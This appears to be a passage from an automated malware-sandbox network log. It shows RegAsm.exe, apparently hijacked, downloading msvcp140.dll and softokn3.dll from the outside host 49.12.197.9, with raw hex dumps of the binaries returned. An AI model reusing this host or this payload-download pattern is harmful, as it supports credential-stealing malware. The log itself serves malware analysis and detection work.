                                                                                                                                                      2024-10-03 07:16:25 UTC16384INData Raw: 8b b8 08 00 00 00 85 ff 0f 84 0b 06 00 00 83 fb 08 0f 86 cc 02 00 00 83 c3 0f 89 d8 83 e0 f0 89 44 24 1c c1 eb 04 c1 e3 05 8d 34 1f 83 c6 50 80 7f 3c 00 89 7c 24 10 89 5c 24 18 74 0a 83 7f 40 00 0f 84 29 06 00 00 8d 47 0c 89 44 24 20 50 ff 15 30 be 08 10 8b 16 85 d2 0f 84 38 01 00 00 83 7a 08 00 0f 84 2e 01 00 00 8b 4a 04 8b 74 8a 0c 85 f6 0f 84 eb 01 00 00 8b 5f 40 85 db 75 60 0f bc fe 89 cb c1 e3 05 09 fb 0f bb fe 8b 7c 24 10 8b 44 24 18 0f af 5c 07 58 8b 44 07 68 89 74 8a 0c 01 d0 01 c3 83 42 08 ff 85 db 0f 84 a2 05 00 00 8b 44 24 1c 01 47 2c ff 74 24 20 ff 15 b0 be 08 10 85 db 0f 84 93 05 00 00 8b 4c 24 60 31 e9 e8 51 e7 01 00 89 d8 8d 65 f4 5e 5f 5b 5d c3 89 4c 24 04 89 54 24 14 8b 0b 8b 7b 04 89 3c 24 0f a4 cf 17 89 c8 c1 e0 17 31 c8 8b 53 0c 33 3c
                                                                                                                                                      Data Ascii: D$4P<|$\$t@)GD$ P08z.Jt_@u`|$D$\XDhtBD$G,t$ L$`1Qe^_[]L$T${<$1S3<
                                                                                                                                                      2024-10-03 07:16:25 UTC16384INData Raw: 83 e1 fe 83 e0 01 09 c8 89 42 04 89 13 8d 44 24 58 e9 75 ff ff ff c7 44 24 3c 00 00 00 00 8b 5c 24 04 e9 a5 fe ff ff 31 d2 a8 10 0f 44 54 24 18 31 c9 39 f2 0f 97 c0 0f 82 e1 fe ff ff 88 c1 e9 d5 fe ff ff b0 01 e9 ec fd ff ff 8b 46 04 83 f8 01 0f 87 13 01 00 00 89 f2 8b 06 31 c9 85 c0 8b 74 24 1c 0f 84 39 04 00 00 8b 48 04 83 e1 fe 89 0a 89 d1 83 e1 fe 89 54 24 04 8b 50 04 83 e2 01 09 ca 89 50 04 8b 54 24 04 8b 52 04 83 e2 01 09 ca 89 50 04 8b 4c 24 04 80 49 04 01 83 60 04 01 89 c1 e9 fb 03 00 00 c7 44 24 28 00 00 00 00 e9 f9 fd ff ff 8d 74 24 54 89 f1 e8 37 0b fe ff 8b 1e e9 47 ff ff ff 83 e3 fe 89 58 04 89 d6 8b 1a 85 db 0f 84 fb 01 00 00 8b 43 04 83 e0 fe 89 06 89 f0 83 e0 fe 8b 4b 04 83 e1 01 09 c1 89 4b 04 8b 4e 04 89 c8 83 e0 fe 0f 84 c0 01 00 00 8b
                                                                                                                                                      Data Ascii: BD$XuD$<\$1DT$19F1t$9HT$PPT$RPL$I`D$(t$T7GXCKKN
                                                                                                                                                      2024-10-03 07:16:25 UTC16384INData Raw: b9 00 00 00 00 0f 44 4c 24 04 31 db 39 c1 0f 97 c1 72 d1 88 cb 8b 50 04 83 e2 fe eb cc 83 e3 fe 89 1a 89 d6 83 e6 fe 8b 18 8b 48 04 83 e1 01 09 f1 89 48 04 85 db 0f 84 8d 0a 00 00 80 63 04 fe 8b 74 24 14 39 16 75 07 89 06 e9 69 ff ff ff 83 e0 fe 8b 56 04 83 e2 01 8d 0c 02 89 4e 04 85 c0 0f 84 25 0a 00 00 8b 08 83 e1 fe 09 d1 89 4e 04 89 30 8b 4e 04 83 e1 01 8b 50 04 83 e2 fe 09 ca 89 50 04 80 4e 04 01 85 ff 0f 84 1f 0a 00 00 39 37 0f 84 a0 05 00 00 e9 e0 05 00 00 8b 4c 24 1c 8b 19 89 d9 ba 00 f0 ff ff 21 d1 8b 70 08 21 d6 31 d2 39 f1 0f 97 c2 b9 ff ff ff ff 0f 42 d1 85 d2 0f 85 59 05 00 00 e9 c0 05 00 00 89 c1 85 d2 0f 85 c2 fe ff ff 8b 54 24 04 c7 02 00 00 00 00 8b 4c 24 08 c7 44 b1 14 01 00 00 00 83 fb 01 0f 84 17 02 00 00 89 10 8b 54 24 20 8b 44 24 48
                                                                                                                                                      Data Ascii: DL$19rPHHct$9uiVN%N0NPPN97L$!p!19BYT$L$DT$ D$H


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      13192.168.2.64973349.12.197.94436880C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-10-03 07:16:26 UTC196OUTGET /msvcp140.dll HTTP/1.1
                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                      Host: 49.12.197.9
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      2024-10-03 07:16:26 UTC262INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx
                                                                                                                                                      Date: Thu, 03 Oct 2024 07:16:26 GMT
                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                      Content-Length: 450024
                                                                                                                                                      Connection: close
                                                                                                                                                      Last-Modified: Thursday, 03-Oct-2024 07:16:26 GMT
                                                                                                                                                      Cache-Control: no-store, no-cache
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-10-03 07:16:26 UTC16122INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_
                                                                                                                                                      2024-10-03 07:16:27 UTC16384INData Raw: 72 00 2d 00 62 00 61 00 00 00 68 00 72 00 2d 00 68 00 72 00 00 00 68 00 75 00 2d 00 68 00 75 00 00 00 68 00 79 00 2d 00 61 00 6d 00 00 00 69 00 64 00 2d 00 69 00 64 00 00 00 69 00 73 00 2d 00 69 00 73 00 00 00 69 00 74 00 2d 00 63 00 68 00 00 00 69 00 74 00 2d 00 69 00 74 00 00 00 6a 00 61 00 2d 00 6a 00 70 00 00 00 6b 00 61 00 2d 00 67 00 65 00 00 00 6b 00 6b 00 2d 00 6b 00 7a 00 00 00 6b 00 6e 00 2d 00 69 00 6e 00 00 00 6b 00 6f 00 2d 00 6b 00 72 00 00 00 6b 00 6f 00 6b 00 2d 00 69 00 6e 00 00 00 00 00 6b 00 79 00 2d 00 6b 00 67 00 00 00 6c 00 74 00 2d 00 6c 00 74 00 00 00 6c 00 76 00 2d 00 6c 00 76 00 00 00 6d 00 69 00 2d 00 6e 00 7a 00 00 00 6d 00 6b 00 2d 00 6d 00 6b 00 00 00 6d 00 6c 00 2d 00 69 00 6e 00 00 00 6d 00 6e 00 2d 00 6d 00 6e 00 00 00 6d
                                                                                                                                                      Data Ascii: r-bahr-hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inko-krkok-inky-kglt-ltlv-lvmi-nzmk-mkml-inmn-mnm
                                                                                                                                                      2024-10-03 07:16:27 UTC16384INData Raw: 00 00 04 00 00 00 04 8b 00 10 18 8b 00 10 78 8a 00 10 e8 7b 00 10 04 7c 00 10 00 00 00 00 d8 4c 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 f4 8a 00 10 00 00 00 00 01 00 00 00 04 00 00 00 44 8b 00 10 58 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 14 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 34 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 84 8b 00 10 98 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 34 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 74 8b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 58 4d 06 10 c8 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 d8 8b 00 10 ec 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 58 4d 06 10 03 00 00 00 00 00 00 00 ff
                                                                                                                                                      Data Ascii: x{|L@DX}0}}M@4}0}}4M@tXM}0}}XM
                                                                                                                                                      2024-10-03 07:16:27 UTC16384INData Raw: d9 00 0f bf 45 fc d9 5d e8 d9 45 10 d9 45 e8 d9 c0 89 45 f4 de ea d9 c9 d9 5d e8 d9 45 e8 d9 55 10 d9 ee da e9 df e0 f6 c4 44 7b 05 dd d8 d9 45 10 8d 45 ec 50 8d 45 f8 50 d9 5d ec e8 fc fa ff ff 59 59 3b f3 0f 8c aa fd ff ff eb 10 8d 4e 01 d9 1c b7 3b cb 7d 06 d9 ee d9 5c b7 04 5e 8b c7 5f 5b c9 c3 55 8b ec 51 56 33 f6 39 75 14 7e 37 d9 ee 57 8b 7d 10 d9 04 b7 d9 5d fc d9 45 fc dd e1 df e0 dd d9 f6 c4 44 7b 1a 51 d9 1c 24 ff 75 0c ff 75 08 e8 97 fc ff ff d9 ee 83 c4 0c 46 3b 75 14 7c d2 dd d8 5f 8b 45 08 5e c9 c3 55 8b ec 51 51 8b 4d 0c 85 c9 75 04 d9 ee c9 c3 8b 55 08 83 f9 01 0f 84 9d 00 00 00 d9 02 d9 5d fc d9 45 fc d9 ee dd e1 df e0 f6 c4 44 0f 8b 82 00 00 00 d9 42 04 d9 5d fc d9 45 fc dd e1 df e0 f6 c4 44 7b 6e 83 f9 02 74 5d d9 42 08 d9 5d fc d9 45
                                                                                                                                                      Data Ascii: E]EEE]EUD{EEPEP]YY;N;}\^_[UQV39u~7W}]ED{Q$uuF;u|_E^UQQMuU]EDB]ED{nt]B]E
                                                                                                                                                      2024-10-03 07:16:27 UTC16384INData Raw: 03 f7 0f b7 06 83 f8 61 74 05 83 f8 41 75 0f 03 f7 0f b7 06 66 3b c1 74 0e 66 3b c2 74 09 8b 45 08 33 db 8b 30 eb 43 03 f7 6a 04 5b 89 75 f8 66 83 3e 28 89 5d f4 75 32 8b de 03 df 68 07 01 00 00 0f b7 03 50 ff 15 ac 72 06 10 59 59 85 c0 75 e9 0f b7 03 83 f8 5f 74 e1 89 5d f8 8b 5d f4 83 f8 29 75 06 8b 75 f8 83 c6 02 8b 45 0c 85 c0 74 02 89 30 8b 45 08 5f 89 30 8b c3 5e 5b c9 c3 55 8b ec 83 ec 48 a1 c0 41 06 10 33 c5 89 45 fc 6b 4d 18 07 33 d2 8b 45 10 53 8b 5d 14 56 8b 75 0c 89 75 d0 89 45 b8 89 55 bc 89 55 c4 89 55 c0 89 4d cc 57 8b fa 83 f9 23 7e 06 6a 23 59 89 4d cc 6a 30 58 89 13 89 53 04 66 39 06 75 12 c7 45 c4 01 00 00 00 83 c6 02 66 39 06 74 f8 89 75 d0 0f b7 0e b8 b8 2d 00 10 89 4d c8 8b 4d cc c7 45 d4 16 00 00 00 8b 75 c8 66 39 30 8b 75 d0 74 0b
                                                                                                                                                      Data Ascii: atAuf;tf;tE30Cj[uf>(]u2hPrYYu_t]])uuEt0E_0^[UHA3EkM3ES]VuuEUUUMW#~j#YMj0XSf9uEf9tu-MMEuf90ut
                                                                                                                                                      2024-10-03 07:16:27 UTC16384INData Raw: c0 75 03 8d 41 1c c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 09 e7 03 10 64 a1 00 00 00 00 50 a1 c0 41 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 e8 79 7b 00 00 50 e8 71 d8 ff ff 59 8b 40 0c 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc 55 8b ec 83 79 38 00 8b 45 08 75 03 83 c8 04 ff 75 0c 50 e8 28 00 00 00 5d c2 08 00 cc cc cc cc 55 8b ec 6a 00 ff 75 08 e8 13 00 00 00 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 83 ec 1c 83 e0 17 89 41 0c 8b 49 10 56 23 c8 74 43 80 7d 0c 00 75 42 f6 c1 04 74 07 be 78 54 00 10 eb 0f be 90 54 00 10 f6 c1 02 75 05 be a8 54 00 10 8d 45 f8 6a 01 50 e8 f7 13 00 00 59 59 50 56 8d 4d e4 e8 bc e2 ff ff 68 a4 1a 04 10 8d 45 e4 50 eb 09 5e c9 c2 08 00 6a 00 6a 00 e8 f0 93 02 00 cc
                                                                                                                                                      Data Ascii: uAUjhdPA3PEdy{PqY@MdYUy8EuuP(]Uju]UEAIV#tC}uBtxTTuTEjPYYPVMhEP^jj
                                                                                                                                                      2024-10-03 07:16:27 UTC16384INData Raw: 51 56 89 45 fc 89 5f 10 e8 bd 54 02 00 8b 45 f8 83 c4 10 c6 04 1e 00 83 f8 10 72 0b 40 50 ff 37 e8 54 95 ff ff 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 b3 be ff ff cc 55 8b ec 83 ec 0c 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d fc 3b c2 72 69 8b 43 14 8d 3c 11 57 8b cb 89 45 f4 e8 88 b1 ff ff 8b f0 8d 4e 01 51 e8 b2 94 ff ff 59 ff 75 18 89 7b 10 8d 4d 0c ff 75 14 8b 7d f4 89 45 f8 89 73 14 ff 75 10 ff 75 fc 83 ff 10 72 17 8b 33 56 50 e8 6b 03 00 00 8d 47 01 50 56 e8 d2 94 ff ff 59 59 eb 07 53 50 e8 56 03 00 00 8b 45 f8 5f 89 03 8b c3 5e 5b c9 c2 14 00 e8 25 be ff ff cc 55 8b ec 83 ec 10 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d f0 3b c2 0f 82 8f 00 00 00 8b 43 14 8d 3c 11 57 8b cb 89 45 fc e8 f6 b0 ff ff 8b f0 8d 4e 01
                                                                                                                                                      Data Ascii: QVE_TEr@P7TYY7_^[UUSVWK+M;riC<WENQYu{Mu}Esuur3VPkGPVYYSPVE_^[%UUSVWK+M;C<WEN
                                                                                                                                                      2024-10-03 07:16:27 UTC16384INData Raw: 83 fe 01 75 04 3b d7 74 3a 8b 5d 08 6a 04 59 89 4d d4 53 33 c0 03 04 cb 52 13 7c cb 04 56 57 50 e8 f1 02 02 00 5b 8b 5d 08 8b f9 8b 4d d4 8b 75 d8 89 54 cb 04 8b 55 e8 89 04 cb 83 e9 01 89 4d d4 79 cf 5f 5e 5b c9 c3 55 8b ec 51 56 8b 75 14 33 d2 85 f6 7e 5f 53 8b 5d 08 29 5d 10 57 8b fb 89 75 fc 8b 5d 10 8b 0c 3b 03 0f 8b 44 3b 04 13 47 04 03 ca 89 0f 8d 7f 08 83 d0 00 8b d0 89 57 fc 83 67 fc 00 83 ee 01 75 dc 0b c6 8b 5d 08 74 22 8b 4d fc 3b 4d 0c 7d 1a 01 14 cb 8b 54 cb 04 13 d6 33 f6 89 54 cb 04 8b c2 21 74 cb 04 41 0b c6 75 e1 5f 5b 5e c9 c3 55 8b ec 8b 55 08 56 8b 75 0c 83 c2 f8 8d 14 f2 8b 02 0b 42 04 75 0b 8d 52 f8 4e 8b 0a 0b 4a 04 74 f5 8b c6 5e 5d c3 55 8b ec 53 56 33 db 33 f6 39 5d 0c 7e 30 57 8b 7d 08 ff 75 14 ff 75 10 ff 74 f7 04 ff 34 f7 e8
                                                                                                                                                      Data Ascii: u;t:]jYMS3R|VWP[]MuTUMy_^[UQVu3~_S])]Wu];D;GWgu]t"M;M}T3T!tAu_[^UUVuBuRNJt^]USV339]~0W}uut4
                                                                                                                                                      2024-10-03 07:16:27 UTC16384INData Raw: cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 7c 69 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 e8 65 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 56 8b f1 ff 76 0c c7 06 4c 68 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 56 8b f1 ff 76 0c c7 06 8c 66 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc 56 8b f1 c7 06 50 69 00 10 e8 e2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 c7 06 90 67 00 10 e8 c2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 ff 76 08 c7 06 7c
                                                                                                                                                      Data Ascii: UQEVuF|ifrjFqY^UQEVuFefrjFqY^VvLhqY(R^VvfqY(R^VPiq(R^Vgq(R^Vv|
                                                                                                                                                      2024-10-03 07:16:27 UTC16384INData Raw: e8 97 73 00 00 84 c0 0f 85 d3 00 00 00 8b 5d ec 80 7f 04 00 75 07 8b cf e8 85 26 00 00 0f b7 47 06 50 ff b5 74 ff ff ff e8 9a a8 ff ff 59 59 83 f8 0a 73 3c 8a 80 2c 6a 00 10 8b 4d 8c 88 85 64 ff ff ff ff b5 64 ff ff ff e8 5f 18 ff ff 8b 4d d8 8d 45 d8 83 fb 10 72 02 8b c1 80 3c 30 7f 74 4c 8d 45 d8 83 fb 10 72 02 8b c1 fe 04 30 eb 3a 8d 45 d8 83 fb 10 72 03 8b 45 d8 80 3c 30 00 74 45 80 7f 04 00 0f b7 47 06 75 0b 8b cf e8 10 26 00 00 0f b7 47 06 66 3b 85 60 ff ff ff 75 27 6a 00 8d 4d d8 e8 04 18 ff ff 46 8b 5d ec 8b cf e8 24 11 00 00 ff 75 98 8b cf e8 de 72 00 00 84 c0 0f 84 4a ff ff ff 8b 5d 90 85 f6 74 13 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 80 3c 30 00 7e 52 46 8a 45 a7 83 7d d4 10 8d 55 c0 72 03 8b 55 c0 84 c0 75 49 85 f6 74 5e 8a 0a 80 f9 7f 74 57 83
                                                                                                                                                      Data Ascii: s]u&GPtYYs<,jMdd_MEr<0tLEr0:ErE<0tEGu&Gf;`u'jMF]$urJ]t}ErE<0~RFE}UrUuIt^tW


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      14192.168.2.64973549.12.197.94436880C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-10-03 07:16:28 UTC196OUTGET /softokn3.dll HTTP/1.1
                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                      Host: 49.12.197.9
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      2024-10-03 07:16:28 UTC262INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx
                                                                                                                                                      Date: Thu, 03 Oct 2024 07:16:28 GMT
                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                      Content-Length: 257872
                                                                                                                                                      Connection: close
                                                                                                                                                      Last-Modified: Thursday, 03-Oct-2024 07:16:28 GMT
                                                                                                                                                      Cache-Control: no-store, no-cache
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-10-03 07:16:28 UTC16122INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00
                                                                                                                                                      Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSw
                                                                                                                                                      2024-10-03 07:16:28 UTC16384INData Raw: 08 c7 85 f0 fe ff ff 00 00 00 00 8d 85 ec fe ff ff 89 85 f4 fe ff ff c7 85 f8 fe ff ff 04 00 00 00 8d 85 f0 fe ff ff 6a 01 50 53 57 e8 85 af 00 00 83 c4 10 89 c6 85 c0 75 3f 8b 85 ec fe ff ff 83 c0 fd 83 f8 01 77 25 be 30 00 00 00 83 3d 28 9a 03 10 00 75 23 83 3d 50 90 03 10 00 74 0e be 01 01 00 00 f6 05 20 9a 03 10 01 74 0c 53 57 e8 e2 b9 00 00 83 c4 08 89 c6 83 3d 2c 9a 03 10 00 0f 84 5e ff ff ff 8b 85 ec fe ff ff 83 c0 fe 83 f8 02 0f 87 4c ff ff ff 56 53 57 68 85 6b 03 10 68 00 01 00 00 8d 85 f0 fe ff ff 50 ff 15 1c 7c 03 10 83 c4 18 e9 2a ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 08 01 00 00 a1 14 90 03 10 31 e8 89 45 f0 c7 85 ec fe ff ff 00 00 00 00 be 30 00 00 00 83 3d 28 9a 03 10 00 74 17 8b 4d f0 31 e9 e8 28 8b 02 00 89
                                                                                                                                                      Data Ascii: jPSWu?w%0=(u#=Pt tSW=,^LVSWhkhP|*USWV1E0=(tM1(
                                                                                                                                                      2024-10-03 07:16:28 UTC16384INData Raw: 40 04 03 45 dc 56 8d 4d ec 51 50 57 e8 55 9e ff ff 83 c4 10 85 c0 0f 85 6b 03 00 00 57 e8 c4 9d ff ff 83 c4 04 ff 75 e8 53 57 e8 f7 9d ff ff 83 c4 0c ff 75 e8 8d 45 e8 50 53 57 e8 26 9e ff ff 83 c4 10 85 c0 0f 85 3c 03 00 00 8b 4d c8 83 c1 01 8b 75 e4 8b 45 dc 01 f0 3b 4d c0 0f 85 6c ff ff ff 31 f6 e9 20 03 00 00 31 f6 ff 35 30 9a 03 10 ff 15 f0 7b 03 10 83 c4 04 a1 34 9a 03 10 85 c0 74 15 6a 01 50 e8 57 4e 02 00 83 c4 08 c7 05 34 9a 03 10 00 00 00 00 a1 38 9a 03 10 85 c0 74 15 6a 01 50 e8 39 4e 02 00 83 c4 08 c7 05 38 9a 03 10 00 00 00 00 a1 3c 9a 03 10 85 c0 74 15 6a 01 50 e8 1b 4e 02 00 83 c4 08 c7 05 3c 9a 03 10 00 00 00 00 56 e8 e8 4d 02 00 83 c4 04 a3 34 9a 03 10 8b 47 38 a3 40 9a 03 10 8b 47 28 a3 44 9a 03 10 8b 47 2c a3 48 9a 03 10 8d 47 04 50 e8
                                                                                                                                                      Data Ascii: @EVMQPWUkWuSWuEPSW&<MuE;Ml1 150{4tjPWN48tjP9N8<tjPN<VM4G8@G(DG,HGP
                                                                                                                                                      2024-10-03 07:16:28 UTC16384INData Raw: 02 10 88 41 02 0f b6 41 03 d1 e8 8a 80 68 f9 02 10 88 41 03 0f b6 41 04 d1 e8 8a 80 68 f9 02 10 88 41 04 0f b6 41 05 d1 e8 8a 80 68 f9 02 10 88 41 05 0f b6 41 06 d1 e8 8a 80 68 f9 02 10 88 41 06 0f b6 41 07 d1 e8 8a 80 68 f9 02 10 88 41 07 ba 01 01 01 01 8b 31 31 d6 33 51 04 b8 01 00 00 00 09 f2 0f 84 37 01 00 00 ba 1f 1f 1f 1f 33 11 be 0e 0e 0e 0e 33 71 04 09 d6 0f 84 20 01 00 00 ba e0 e0 e0 e0 33 11 be f1 f1 f1 f1 33 71 04 09 d6 0f 84 09 01 00 00 ba fe fe fe fe 8b 31 31 d6 33 51 04 09 f2 0f 84 f5 00 00 00 ba 01 fe 01 fe 8b 31 31 d6 33 51 04 09 f2 0f 84 e1 00 00 00 ba fe 01 fe 01 8b 31 31 d6 33 51 04 09 f2 0f 84 cd 00 00 00 ba 1f e0 1f e0 33 11 be 0e f1 0e f1 33 71 04 09 d6 0f 84 b6 00 00 00 ba e0 1f e0 1f 33 11 be f1 0e f1 0e 33 71 04 09 d6 0f 84 9f 00
                                                                                                                                                      Data Ascii: AAhAAhAAhAAhAAhA113Q733q 33q113Q113Q113Q33q33q
                                                                                                                                                      2024-10-03 07:16:28 UTC16384INData Raw: c0 0f 84 30 07 00 00 83 7b 08 14 0f 84 43 01 00 00 e9 21 07 00 00 3d 50 06 00 00 0f 8f aa 01 00 00 3d 51 05 00 00 74 2d 3d 52 05 00 00 74 12 3d 55 05 00 00 0f 85 0a 07 00 00 c7 47 0c 01 00 00 00 83 7b 04 00 0f 84 ec 06 00 00 83 7b 08 10 0f 85 e2 06 00 00 c7 47 18 10 00 00 00 83 7c 24 24 25 0f 85 fb 07 00 00 6a 11 ff 74 24 30 e8 44 c7 00 00 83 c4 08 85 c0 0f 84 78 09 00 00 89 c7 31 c0 81 3b 51 05 00 00 0f 95 c0 ff 77 1c 8b 4d 20 51 50 ff 73 04 ff 77 18 e8 09 1e ff ff 83 c4 14 8b 4c 24 28 89 41 64 57 e8 a9 c6 00 00 83 c4 04 8b 44 24 28 83 78 64 00 0f 84 bf 08 00 00 83 7d 20 00 b9 60 2a 00 10 ba 20 2a 00 10 0f 44 d1 89 50 74 c7 80 84 00 00 00 e0 29 00 10 e9 eb 08 00 00 3d 09 21 00 00 0f 8e 1c 02 00 00 3d 0a 21 00 00 0f 84 08 02 00 00 3d 0b 21 00 00 0f 84 23
                                                                                                                                                      Data Ascii: 0{C!=P=Qt-=Rt=UG{{G|$$%jt$0Dx1;QwM QPswL$(AdWD$(xd} `* *DPt)=!=!=!#
                                                                                                                                                      2024-10-03 07:16:28 UTC16384INData Raw: 5f 5b 5d c3 cc cc 55 89 e5 53 57 56 83 ec 10 a1 14 90 03 10 31 e8 89 45 f0 ff 75 08 e8 35 ab 00 00 83 c4 04 85 c0 74 5f 89 c6 8b 78 38 bb 91 00 00 00 85 ff 74 56 83 3f 03 75 51 8b 4d 18 8b 47 04 83 7d 14 00 74 59 8b 5d 0c 85 c0 74 64 89 ce 8b 4d 08 89 da 6a 03 ff 75 10 e8 47 fa ff ff 83 c4 08 89 c3 85 c0 75 24 56 ff 75 14 ff 75 08 e8 72 fd ff ff 83 c4 0c 89 c6 8b 4d f0 31 e9 e8 a3 8b 01 00 89 f0 eb 11 bb b3 00 00 00 8b 4d f0 31 e9 e8 90 8b 01 00 89 d8 83 c4 10 5e 5f 5b 5d c3 85 c0 74 06 83 7f 68 00 74 5a 81 c7 90 00 00 00 eb 55 8b 01 89 45 e8 8b 47 64 89 45 e4 8b 4f 74 ff 15 00 a0 03 10 8d 45 ec ff 75 10 53 ff 75 e8 50 ff 75 14 ff 75 e4 ff d1 83 c4 18 85 c0 74 32 e8 a1 8d 01 00 50 e8 eb 84 00 00 83 c4 04 8b 55 ec 8b 4d 18 89 11 bb 50 01 00 00 3d 50 01 00
                                                                                                                                                      Data Ascii: _[]USWV1Eu5t_x8tV?uQMG}tY]tdMjuGu$VuurM1M1^_[]thtZUEGdEOtEuSuPuut2PUMP=P
